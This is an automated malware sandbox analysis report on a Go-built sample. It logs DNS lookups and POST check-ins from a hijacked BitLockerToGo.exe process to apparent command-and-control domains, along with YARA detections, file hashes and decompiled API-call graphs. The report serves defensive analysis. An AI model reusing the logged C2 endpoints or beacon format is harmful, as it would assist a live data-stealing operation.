                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                  Sep 26, 2024 09:47:00.702846050 CEST192.168.2.91.1.1.10xa8deStandard query (0)pianoswimen.shopA (IP address)IN (0x0001)false
                                  Sep 26, 2024 09:47:00.715068102 CEST192.168.2.91.1.1.10x1a91Standard query (0)racedsuitreow.shopA (IP address)IN (0x0001)false
                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                  Sep 26, 2024 09:47:00.711632967 CEST1.1.1.1192.168.2.90xa8deName error (3)pianoswimen.shopnonenoneA (IP address)IN (0x0001)false
                                  Sep 26, 2024 09:47:00.724320889 CEST1.1.1.1192.168.2.90x1a91No error (0)racedsuitreow.shop104.21.37.97A (IP address)IN (0x0001)false
                                  Sep 26, 2024 09:47:00.724320889 CEST1.1.1.1192.168.2.90x1a91No error (0)racedsuitreow.shop172.67.206.221A (IP address)IN (0x0001)false
                                  • racedsuitreow.shop
                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.949708104.21.37.974432600C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                  TimestampBytes transferredDirectionData
                                  2024-09-26 07:47:01 UTC265OUTPOST /api HTTP/1.1
                                  Connection: Keep-Alive
                                  Content-Type: application/x-www-form-urlencoded
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                  Content-Length: 8
                                  Host: racedsuitreow.shop
                                  2024-09-26 07:47:01 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                  Data Ascii: act=life
                                  2024-09-26 07:47:01 UTC551INHTTP/1.1 200 OK
                                  Date: Thu, 26 Sep 2024 07:47:01 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  X-Frame-Options: SAMEORIGIN
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FFl9hwRxgk31yH1bt%2FN2s0E6MabsdhPlzEZSEzI7iCYnZ6M2ThMGoPWd%2BJsfF6Alrg34bEd0pqoGMavKJ3oVdQF157reoRxcEBk8WTALpoHSXhhjkvKGbMk85GQHUOYwyKXXm68%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8c91a4bd489c334e-EWR
                                  2024-09-26 07:47:01 UTC818INData Raw: 31 31 32 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                  Data Ascii: 112d<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                  2024-09-26 07:47:01 UTC1369INData Raw: 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b
                                  Data Ascii: cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cook
                                  2024-09-26 07:47:01 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 30 75 6d 52 6c 35 6f 49 4b 4d 7a 48 66 66 47 59 51 7a 48 56 47 57 53 63 75 57 41 5f 6f 77 36 62 36 68 4e 74 31 4a 61 46 4a 4f 63 2d 31 37 32 37 33 33 36 38 32 31 2d 30 2e 30 2e 31 2e 31 2d 2f 61 70 69 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74
                                  Data Ascii: <input type="hidden" name="atok" value="0umRl5oIKMzHffGYQzHVGWScuWA_ow6b6hNt1JaFJOc-1727336821-0.0.1.1-/api"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" st
                                  2024-09-26 07:47:01 UTC849INData Raw: 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 61
                                  Data Ascii: m:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</a
                                  2024-09-26 07:47:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  1192.168.2.949709104.21.37.974432600C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                  TimestampBytes transferredDirectionData
                                  2024-09-26 07:47:01 UTC355OUTPOST /api HTTP/1.1
                                  Connection: Keep-Alive
                                  Content-Type: application/x-www-form-urlencoded
                                  Cookie: __cf_mw_byp=0umRl5oIKMzHffGYQzHVGWScuWA_ow6b6hNt1JaFJOc-1727336821-0.0.1.1-/api
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                  Content-Length: 80
                                  Host: racedsuitreow.shop
                                  2024-09-26 07:47:01 UTC80OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 74 4c 59 4d 65 35 2d 2d 72 75 69 33 33 33 26 6a 3d 35 63 39 62 38 36 37 34 61 36 33 30 64 39 31 30 31 62 34 36 37 33 33 61 61 33 37 66 31 35 65 63
                                  Data Ascii: act=recive_message&ver=4.0&lid=tLYMe5--rui333&j=5c9b8674a630d9101b46733aa37f15ec
                                  2024-09-26 07:47:02 UTC770INHTTP/1.1 200 OK
                                  Date: Thu, 26 Sep 2024 07:47:02 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: PHPSESSID=cvu3v8qclegvvelgaj1jlrdl7g; expires=Mon, 20 Jan 2025 01:33:41 GMT; Max-Age=9999999; path=/
                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                  Cache-Control: no-store, no-cache, must-revalidate
                                  Pragma: no-cache
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BSCjsOIXtVoH1lYtyqWvinIA5xvaS58qivvsSgRVAo8%2FsMhseP8EKGCrp9UlRktSLUrNT6EyvOLQfx6aypGkPjdLqx7J0j596RUmILCCAVPmgc7TwVBQZDCKLHXN1WE85fGTCZM%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8c91a4c1da572394-EWR
                                  2024-09-26 07:47:02 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                  Data Ascii: aerror #D12
                                  2024-09-26 07:47:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Click to jump to process

                                  Click to jump to process

                                  Click to dive into process behavior distribution

                                  Click to jump to process

                                  Target ID:0
                                  Start time:03:46:15
                                  Start date:26/09/2024
                                  Path:C:\Users\user\Desktop\iq2HxA0SLw.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Users\user\Desktop\iq2HxA0SLw.exe"
                                  Imagebase:0x7ff6a8bf0000
                                  File size:19'231'232 bytes
                                  MD5 hash:DA6F9E46EACBDE011E7D9A6E742D05C9
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:Go lang
                                  Yara matches:
                                  • Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000002.1859291305.000000C000716000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                  • Rule: JoeSecurity_GoInjector_2, Description: Yara detected Go Injector, Source: 00000000.00000000.1418035635.00007FF6A99C7000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_GoInjector_2, Description: Yara detected Go Injector, Source: 00000000.00000002.1863283759.00007FF6A99C7000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  Reputation:low
                                  Has exited:true

                                  Target ID:5
                                  Start time:03:46:59
                                  Start date:26/09/2024
                                  Path:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                  Imagebase:0xd0000
                                  File size:231'736 bytes
                                  MD5 hash:A64BEAB5D4516BECA4C40B25DC0C1CD8
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:moderate
                                  Has exited:true

                                  Reset < >

                                    Execution Graph

                                    Execution Coverage:1.2%
                                    Dynamic/Decrypted Code Coverage:0%
                                    Signature Coverage:56.6%
                                    Total number of Nodes:106
                                    Total number of Limit Nodes:14
                                    execution_graph 19758 29a6058 19759 29a60d6 LoadLibraryExW 19758->19759 19760 29a60a4 19758->19760 19760->19759 19824 29a3ea8 19825 29a3f12 19824->19825 19827 29a3eb4 19824->19827 19826 29a3ef4 RtlFreeHeap 19826->19825 19827->19826 19761 2972773 19789 299fad0 19761->19789 19790 299fb3b 19789->19790 19791 299fbac CoCreateInstance 19790->19791 19791->19790 19791->19791 19792 299fcbc CoSetProxyBlanket 19793 299fce0 19792->19793 19794 299fe10 19792->19794 19795 299fd4b SysAllocString 19793->19795 19798 299fe98 VariantInit 19794->19798 19799 29a011e SysFreeString SysFreeString 19794->19799 19800 29a00ff VariantClear 19794->19800 19801 29a0114 19794->19801 19802 299ff57 SysStringLen 19794->19802 19804 299ff7c 19794->19804 19796 299fdfb SysAllocString 19795->19796 19797 299fdcf 19795->19797 19796->19794 19797->19796 19803 299fefc 19798->19803 19800->19801 19801->19799 19802->19804 19803->19800 19803->19802 19803->19804 19804->19800 19805 2972751 CoInitializeSecurity 19828 296d1a0 19829 296d1a9 19828->19829 19830 296d1b1 GetInputState 19829->19830 19831 296d38e ExitProcess 19829->19831 19832 296d1be 19830->19832 19833 296d1c6 GetCurrentThreadId GetCurrentProcessId 19832->19833 19834 296d389 19832->19834 19836 296d1f9 19833->19836 19841 29a6b30 19834->19841 19836->19834 19840 2972730 CoInitialize 19836->19840 19844 29a8190 19841->19844 19843 29a6b35 FreeLibrary 19843->19831 19845 29a8199 19844->19845 19845->19843 19846 296f860 19847 296f89f 19846->19847 19850 2970770 19847->19850 19849 296fa7d 19851 29709d5 19850->19851 19852 29a6b50 RtlAllocateHeap 19851->19852 19853 2970a3c 19851->19853 19852->19851 19853->19849 19806 299fc10 19807 299fc8b SysAllocString 19806->19807 19808 299fc56 19806->19808 19809 299fcb0 19807->19809 19808->19807 19854 29aa720 19856 29aa740 19854->19856 19855 29aa87e 19856->19855 19858 29a7130 LdrInitializeThunk 19856->19858 19858->19855 19859 29a0161 SysFreeString 19860 29a0171 19859->19860 19861 29a0189 GetVolumeInformationW 19860->19861 19863 29a01aa 19861->19863 19878 29a0277 19861->19878 19863->19878 19881 29a3e10 19863->19881 19864 29a04f8 19865 29a0569 19870 29a42a0 LdrInitializeThunk 19865->19870 19866 29a053d 19898 29a42a0 19866->19898 19867 29a0523 19872 29a4360 LdrInitializeThunk 19867->19872 19868 29a0516 19890 29a4360 19868->19890 19873 29a0572 19870->19873 19872->19866 19873->19873 19874 29a035e 19874->19864 19874->19865 19874->19866 19874->19867 19874->19868 19879 29a0384 19874->19879 19886 29a4130 19874->19886 19875 29a02cf 19875->19874 19885 29a7130 LdrInitializeThunk 19875->19885 19879->19878 19884 29a7130 LdrInitializeThunk 19879->19884 19882 29a3e66 RtlAllocateHeap 19881->19882 19883 29a3e34 19881->19883 19882->19875 19883->19882 19884->19878 19885->19874 19887 29a4141 19886->19887 19888 29a41fe 19886->19888 19887->19888 19902 29a7130 LdrInitializeThunk 19887->19902 19888->19874 19891 29a4413 19890->19891 19892 29a4376 19890->19892 19891->19867 19892->19891 19896 29a440e 19892->19896 19903 29a7130 LdrInitializeThunk 19892->19903 19893 29a454e 19893->19891 19894 29a42a0 LdrInitializeThunk 19893->19894 19894->19891 19896->19893 19904 29a7130 LdrInitializeThunk 19896->19904 19899 29a432e 19898->19899 19900 29a42b0 19898->19900 19899->19865 19900->19899 19905 29a7130 LdrInitializeThunk 19900->19905 19902->19888 19903->19896 19904->19893 19905->19899 19810 29a7415 19811 29a7521 19810->19811 19812 29a73e1 19810->19812 19813 29a74f0 19810->19813 19814 29a76b2 19810->19814 19812->19810 19812->19811 19812->19813 19812->19814 19817 29a759e 19812->19817 19820 29a7130 LdrInitializeThunk 19812->19820 19813->19817 19821 29a7130 LdrInitializeThunk 19813->19821 19814->19811 19814->19813 19814->19817 19823 29a7130 LdrInitializeThunk 19814->19823 19817->19811 19822 29a7130 LdrInitializeThunk 19817->19822 19820->19812 19821->19817 19822->19811 19823->19813 19906 29a78e5 19907 29a78ef 19906->19907 19909 29a79de 19907->19909 19913 29a7130 LdrInitializeThunk 19907->19913 19912 29a7130 LdrInitializeThunk 19909->19912 19911 29a7b38 19912->19911 19913->19909

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 196 299fcbc-299fcd9 CoSetProxyBlanket 197 299fce0 196->197 198 299fe10 196->198 199 299fe20 196->199 200 299fce6-299fd11 196->200 201 299fe26-299fe50 196->201 197->200 198->199 199->201 202 299fd4b-299fdcd SysAllocString 200->202 203 299fd13 200->203 208 299fe98-299fefa VariantInit 201->208 209 29a00e9 201->209 210 29a00d9-29a00e2 201->210 211 29a011e-29a0130 SysFreeString * 2 201->211 212 29a00ff-29a0110 VariantClear 201->212 213 29a00c0-29a00d2 201->213 214 299fe57-299fe73 201->214 215 29a0114-29a011a 201->215 216 299ff57-299ff7a SysStringLen 201->216 206 299fdfb-299fe0b SysAllocString 202->206 207 299fdcf 202->207 205 299fd20-299fd49 call 29a3b80 203->205 205->202 206->198 218 299fdd0-299fdf9 call 29a3c20 207->218 222 299ff2b-299ff39 208->222 223 299fefc-299feff 208->223 209->212 210->209 210->210 210->213 212->215 213->209 213->210 227 299fe77-299fe91 214->227 215->211 219 299ffb8 216->219 220 299ff7c-299ff80 216->220 218->206 226 299ffba-299ffd4 call 296cae0 219->226 225 299ff90-299ff94 220->225 230 299ff3d-299ff50 222->230 228 299ff00-299ff29 call 29a3cb0 223->228 225->226 231 299ff96-299ffb2 225->231 238 299ffda-299ffe3 226->238 239 29a00a5-29a00b9 226->239 227->208 227->209 227->210 227->212 227->213 227->215 227->216 228->222 230->209 230->210 230->212 230->213 230->216 234 299ff82-299ff8e 231->234 235 299ffb4-299ffb6 231->235 234->225 234->226 235->234 238->239 240 299ffe9-299fff8 238->240 239->209 239->210 239->213 241 299fffb-29a0002 240->241 241->239 242 29a0008-29a000c 241->242 243 29a000e-29a0015 242->243 244 29a0017-29a0029 242->244 245 29a0084-29a008a 243->245 246 29a002b-29a0031 244->246 247 29a0051-29a005a 244->247 250 29a008c-29a0099 245->250 251 29a00a1 245->251 246->247 248 29a0033-29a004f 246->248 247->245 249 29a005c-29a007f 247->249 248->245 249->245 250->241 252 29a009f 250->252 251->239 252->239
                                    APIs
                                    • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0299FCCE
                                    • SysAllocString.OLEAUT32 ref: 0299FD4C
                                    • SysAllocString.OLEAUT32 ref: 0299FDFC
                                    • VariantInit.OLEAUT32(00000000), ref: 0299FE9D
                                    • SysStringLen.OLEAUT32(?), ref: 0299FF5B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: String$Alloc$BlanketInitProxyVariant
                                    • String ID: 0}'c$=k=i$DeDk$Hi$o
                                    • API String ID: 3311126758-330520821
                                    • Opcode ID: 4da85b75addf23ef2309837be93a3552f860aae23ddf3a54151ae21a7cbb55ac
                                    • Instruction ID: 5009838d45742a93a720c5921b75ea25259f31a836e3df3356b5d513015afdf6
                                    • Opcode Fuzzy Hash: 4da85b75addf23ef2309837be93a3552f860aae23ddf3a54151ae21a7cbb55ac
                                    • Instruction Fuzzy Hash: FBC18671908381DFEB108F28D495B2ABBE5FF8A355F148D1CF5958B2A1C375D944CB82

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 253 2970770-29709d3 254 29709d5 253->254 255 2970a0d-2970a35 253->255 256 29709e0-2970a0b call 2972050 254->256 259 2970cb7-2970d1e 255->259 260 2970b15-2970b39 255->260 261 2970dd5-2970def 255->261 262 2970e14-2970e28 255->262 263 2970c91-2970c98 255->263 264 2970df0-2970e04 255->264 265 2970c9f-2970caa 255->265 266 2970a3c-2970a45 255->266 267 2970a7b-2970a82 255->267 268 2970b7b-2970b93 255->268 269 2970c7b-2970c8c 255->269 270 2970b98-2970bc5 255->270 271 2970a8f-2970ab3 255->271 272 2970b6d-2970b74 255->272 256->255 301 2970d20-2970d49 call 2972240 259->301 302 2970d4b-2970d53 259->302 274 2970b00-2970b0f 260->274 275 2970b3b 260->275 261->264 279 2970f17 262->279 280 2970f57-2970f5e 262->280 281 2970e76 262->281 282 2970f73-2970f7e 262->282 283 2970f92-2970f94 262->283 284 2970eb2-2970eb9 262->284 285 2970e90-2970e9b call 29a6b50 262->285 286 2970ef0 262->286 287 2970e9e-2970ea9 call 29a6b50 262->287 288 2970f1d-2970f29 262->288 289 2970f9b-2970f9d 262->289 290 2970f1b 262->290 291 2970e87 262->291 292 2970f85-2970f89 262->292 293 2970f02-2970f10 262->293 294 2970ec0-2970ee5 262->294 295 2970f00 262->295 296 2970e80 262->296 297 2970e2f 262->297 263->259 263->261 263->262 263->264 263->265 263->279 263->280 263->281 263->282 263->283 263->284 263->285 263->286 263->287 263->288 263->289 263->290 263->291 263->292 263->293 263->294 263->295 263->296 263->297 306 2970e0e 264->306 265->259 307 2970a65-2970a69 266->307 267->271 276 2970f3f-2970f50 268->276 300 2970f2e-2970f38 269->300 277 2970bc7 270->277 278 2970bfb-2970c29 270->278 298 2970ab5 271->298 299 2970aeb-2970afa 271->299 272->259 272->261 272->262 272->263 272->264 272->265 272->268 272->269 272->270 274->260 311 2970b40-2970b69 call 29720d0 275->311 276->259 276->261 276->262 276->263 276->264 276->265 276->268 276->269 276->270 276->279 276->280 276->281 276->282 276->283 276->284 276->285 276->286 276->287 276->288 276->289 276->290 276->291 276->292 276->293 276->294 276->295 276->296 276->297 313 2970bd0-2970bf9 call 29721b0 277->313 315 2970c56-2970c74 278->315 316 2970c2b 278->316 279->290 317 2970f65-2970f6c 280->317 318 2970e35-2970e45 call 29a3e80 280->318 282->279 282->280 282->281 282->284 282->285 282->286 282->287 282->288 282->290 282->291 282->292 282->293 282->294 282->295 282->296 283->289 284->279 284->280 284->286 284->290 284->291 284->293 284->294 284->295 284->296 285->287 312 2970ef5-2970efb 286->312 287->284 314 2970e50-2970e55 288->314 337 2970fa4 289->337 290->288 291->285 336 2970f90 292->336 293->279 293->280 293->290 294->312 296->291 308 2970ac0-2970ae9 call 29720d0 298->308 299->260 300->276 301->302 303 2970d55-2970d5f 302->303 304 2970d71-2970d80 302->304 320 2970d60-2970d6f 303->320 321 2970da5-2970dc8 304->321 322 2970d82-2970d84 304->322 306->262 323 2970a6b-2970a7a 307->323 308->299 349 2970b6b 311->349 312->295 313->278 341 2970e5c-2970e6f 314->341 315->259 315->261 315->262 315->263 315->264 315->265 315->269 315->279 315->280 315->281 315->282 315->283 315->284 315->285 315->286 315->287 315->288 315->289 315->290 315->291 315->292 315->293 315->294 315->295 315->296 315->297 334 2970c30-2970c54 call 2972140 316->334 317->282 317->317 317->318 318->307 318->314 318->323 320->304 320->320 321->261 339 2970d90-2970da1 322->339 334->315 336->300 337->337 339->339 347 2970da3 339->347 341->279 341->280 341->281 341->284 341->285 341->286 341->287 341->290 341->291 341->293 341->294 341->295 341->296 347->321 349->274
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 47$5C1A$A?=$FsOq$G+)$PG8E$UwOu$W/[-$Y3G1$]kQi$`_l]$a7]5$dS`Q$hi$l[zY$sKuI
                                    • API String ID: 0-3373099803
                                    • Opcode ID: 8b313d762ed30fb8c499c1bf4cef12b46c9bb1c6f253b47ceade09968e05c853
                                    • Instruction ID: 99d93c609c4792bab66ed9a0358f783839bb4e9d3bc72cf9a9c034201966b819
                                    • Opcode Fuzzy Hash: 8b313d762ed30fb8c499c1bf4cef12b46c9bb1c6f253b47ceade09968e05c853
                                    • Instruction Fuzzy Hash: B0122EB450C380DBD7219F24D994B6FBBF9FF86314F148D2CEA898A240E7769814CB56

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 351 29a0161-29a01a3 SysFreeString call 29a9cf0 GetVolumeInformationW 355 29a02be-29a02c0 351->355 356 29a01f2-29a01fb 351->356 357 29a02b2-29a02b7 351->357 358 29a01d0-29a01d9 351->358 359 29a01f0 351->359 360 29a0250-29a025d 351->360 361 29a02b0 351->361 362 29a0277-29a027e 351->362 363 29a01aa-29a01c2 351->363 364 29a0202 351->364 365 29a01e0-29a01ef 351->365 366 29a0264-29a0270 351->366 367 29a0205-29a022f call 2996a80 351->367 368 29a02c5-29a02ca call 29a3e10 351->368 370 29a0420-29a0427 355->370 356->355 356->357 356->360 356->361 356->364 356->366 356->367 356->368 357->355 357->368 358->355 358->356 358->357 358->359 358->360 358->361 358->364 358->365 358->366 358->367 358->368 359->356 360->355 360->357 360->360 360->361 360->366 360->368 362->361 363->355 363->356 363->357 363->358 363->359 363->360 363->361 363->362 363->364 363->365 363->366 363->367 363->368 364->367 365->359 366->355 366->356 366->357 366->358 366->359 366->360 366->361 366->362 366->364 366->365 366->366 366->367 366->368 374 29a0230-29a0238 367->374 373 29a02cf-29a02f9 368->373 375 29a032b-29a0337 373->375 376 29a02fb 373->376 374->374 380 29a023a-29a0243 374->380 378 29a0339-29a0341 375->378 379 29a036c-29a037d 375->379 377 29a0300-29a0329 call 29a3470 376->377 377->375 382 29a0350-29a0357 378->382 383 29a04f8 379->383 384 29a0569-29a056d call 29a42a0 379->384 385 29a045f-29a0472 379->385 386 29a048f-29a04f1 call 29a4110 call 29a4130 379->386 387 29a0543-29a054c 379->387 388 29a0510 379->388 389 29a0530-29a053d call 29a4360 379->389 390 29a0560-29a0564 call 29a42a0 379->390 391 29a0480-29a0488 379->391 392 29a0516-29a0523 call 29a4360 379->392 393 29a0384-29a03ae call 29a3e80 379->393 380->355 380->357 380->360 380->361 380->366 380->368 398 29a0359-29a035c 382->398 399 29a0360-29a0366 382->399 383->388 403 29a0572 384->403 385->383 385->384 385->386 385->387 385->388 385->389 385->390 385->391 385->392 385->393 386->383 386->384 386->387 386->388 386->389 386->390 386->391 386->392 387->390 389->387 390->384 391->383 391->384 391->386 391->387 391->388 391->389 391->390 391->391 391->392 391->393 392->389 412 29a03b0-29a03d4 call 29a3470 393->412 413 29a03d6-29a03dd 393->413 398->382 405 29a035e 398->405 399->379 406 29a0428-29a0458 call 29a7130 399->406 403->403 405->379 406->383 406->384 406->385 406->386 406->387 406->388 406->389 406->390 406->391 406->392 406->393 412->413 414 29a041a-29a041e 413->414 415 29a03df-29a03eb 413->415 414->370 420 29a03f0-29a03f7 415->420 421 29a03f9-29a03fc 420->421 422 29a0400-29a0406 420->422 421->420 423 29a03fe 421->423 422->414 424 29a0408-29a0417 call 29a7130 422->424 423->414 424->414
                                    APIs
                                    • SysFreeString.OLEAUT32 ref: 029A0161
                                    • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 029A019A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: FreeInformationStringVolume
                                    • String ID: 4`[b$efg`$efg`
                                    • API String ID: 983506298-1001238494
                                    • Opcode ID: 13f3d7edbb5d2bcdb6c8f9d1ba034ea932094a96e999bb884aa45972e5d74564
                                    • Instruction ID: e88e80f32b4d3c8aea149d2f46df4d5de137a76a3f9959091ea87ed4f6996026
                                    • Opcode Fuzzy Hash: 13f3d7edbb5d2bcdb6c8f9d1ba034ea932094a96e999bb884aa45972e5d74564
                                    • Instruction Fuzzy Hash: FDA1DE75A4C301EFD705DF24E861B2AB7E6FBC9715F148C2CE48997281D731A820CB92

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
